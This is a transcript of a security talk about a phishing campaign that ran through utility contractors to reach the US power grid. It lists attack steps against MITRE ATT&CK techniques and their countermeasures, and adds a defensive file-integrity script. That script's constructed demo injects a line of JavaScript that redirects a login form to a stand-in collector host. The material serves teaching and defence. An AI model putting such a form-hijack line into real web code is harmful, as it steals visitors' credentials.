TRANSCRIPT
YOU’VE BEEN PWNED… but your customers are the target
Lessons learned from attacks against the power grid.
Christopher Hickernell, Security Architect
linkedin.com/in/christopherhickernell
@cahickernell
17 years of experience
B.S. Information Systems
M.S. Information Security
CISSP, CCSP, GSLC, CCNA R&S, CCNA Security, Security+
Source Article
THE WALL STREET JOURNAL
Published Jan 10, 2019
By Rebecca Smith and Rob Barry
Attack Timeline (2016 to 2018)
Date markers recovered from the slide: 2016; early March, late March, April, early June, late June, October and December 2017; 2018.
Events, in the order the slide builds them:
- “Control Engineering” website hacked to capture visitors’ passwords
- All-Ways Excavating email compromised
- All-Ways customers are phished, directing them to another credential harvesting website
- Dan Kauffman Excavating is compromised
- Kauffman mailbox used to send 2,300 phishing emails containing a fake Dropbox link
- Corvallis, Ore.-based firm is compromised
- Corvallis network and fake email persona used to phish DeVange Construction
- Fake DeVange email used to send malicious attachments to utilities
- Power grid compromised
- Attackers still active
CASE STUDIES
Case #1: Malicious file uploaded onto the website for trade journals (CFE Media LLC). Website code harvested usernames and passwords from visitors.
MITRE ATT&CK: Initial Access: Exploit Public-Facing Application
Countermeasures: File integrity checking; application isolation; web application firewall; log monitoring
Target: Website for trade journals
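File integrity checking is the first countermeasure listed for Case #1, and it is the control that would have caught a foreign file dropped into the trade journal's web root (from the visitors' side the same event is a watering hole, ATT&CK Drive-by Compromise). The script below is an added example, not code from the talk or from CFE Media: it hashes every file under a web root into a baseline manifest, then reports files that were added, modified or removed. The directory layout, file contents and the injected `js/login.js` are constructed for the demo. The one design point that matters is where the baseline lives: it must be stored somewhere the web server account cannot write, otherwise the intruder who edits the site can edit the baseline too.

```python
"""File-integrity baseline and drift check for a web root.
Added example; not from the talk. Assumes the baseline manifest is
kept off-host or on read-only storage (see lead-in)."""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path, chunk=65536):
    """Stream a file through SHA-256 so large assets do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each regular file under root (relative POSIX path) to its SHA-256.
    Symlinks are skipped so a link pointing outside the root cannot be
    used to make the manifest 'cover' content the server never serves."""
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            manifest[p.relative_to(root).as_posix()] = sha256_of(p)
    return manifest


def diff_manifests(baseline, current):
    """Return added, removed and modified paths between two manifests."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
    }


def demo():
    """Constructed scenario: baseline a small site, then simulate an intruder
    dropping a credential-stealing script and editing a page to load it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "js").mkdir()
        (root / "index.html").write_text("<html><body>Control Engineering</body></html>")
        (root / "js" / "app.js").write_text("console.log('app');")
        (root / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
        baseline = build_manifest(root)

        # Tampering after the baseline was taken (all constructed).
        (root / "js" / "login.js").write_text(
            "document.forms[0].action='http://collector.example.invalid/';")
        (root / "index.html").write_text(
            "<html><body>Control Engineering"
            "<script src=js/login.js></script></body></html>")
        (root / "logo.png").unlink()
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Run it on a schedule (or from a deploy hook) against the real web root with a baseline regenerated only by the release process; anything in `added` or `modified` that the release did not produce is an incident, not a curiosity.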
Case #2: Commandeered email account (Mr. Vitello, All-Ways Excavating USA) was used to send messages to customers. The message sent recipients to a malicious website (imageliners.com) that looked like Dropbox.
MITRE ATT&CK: Persistence: Valid Accounts
Countermeasures: Email filtering; multi-factor authentication; expiring passwords
Target: Business email
Case #3: Mr. Vitello's email account was used by the attackers multiple times, even to respond to customers' inquiries about the strange messages they were receiving from Mr. Vitello.
MITRE ATT&CK: Persistence: Valid Accounts
Countermeasures: Incident response; clean-up and prevention
Target: Business email
Case #4: Harvested credentials were used to gain access to the Corvallis network, and the attackers modified the Internet firewall undetected.
MITRE ATT&CK: Persistence: Valid Accounts
Countermeasure: Monitor system changes
Target: Network firewall
Case #5: Attackers accessed the Corvallis network multiple times from foreign countries (Turkey, France, Netherlands).
MITRE ATT&CK: Persistence: Valid Accounts
Countermeasures: Geo-fencing; geo-blocking
Target: Corporate network
Case #6: Attackers visited corporate VPN login pages.
MITRE ATT&CK: Initial Access: External Remote Services; Persistence: Valid Accounts
Countermeasure: Multi-factor authentication
Target: VPN login
Case #7: Attackers used fake personas to send emails to utility companies with malicious attachments (resumes).
MITRE ATT&CK: Persistence: Create Account; Persistence: Valid Accounts
Countermeasures: Email security (spam, anti-spoof, anti-malware, sandbox, URL rewriting); end-user awareness; client security
Target: Business email
Case #8: Attackers penetrated the control-system area of utilities through poorly protected jump boxes.
MITRE ATT&CK: Persistence: Valid Accounts; Lateral Movement: Remote Desktop Protocol
Countermeasures: Endpoint security; detection and response; secure baseline configuration
Target: Endpoint
Case #9: All-Ways Excavating was again hacked. Industry experts say Russian government hackers likely remain inside some systems, undetected and awaiting further orders.
MITRE ATT&CK: Persistence: Valid Accounts; Persistence: Account Manipulation
Countermeasures: Incident response; user behavior analysis; deception (honeypot, honeynet, honeycred)
Target: Business network
Questions
Stories
Tech
In a cyber world, every business can be targeted.
So… Be Brilliant on The Basics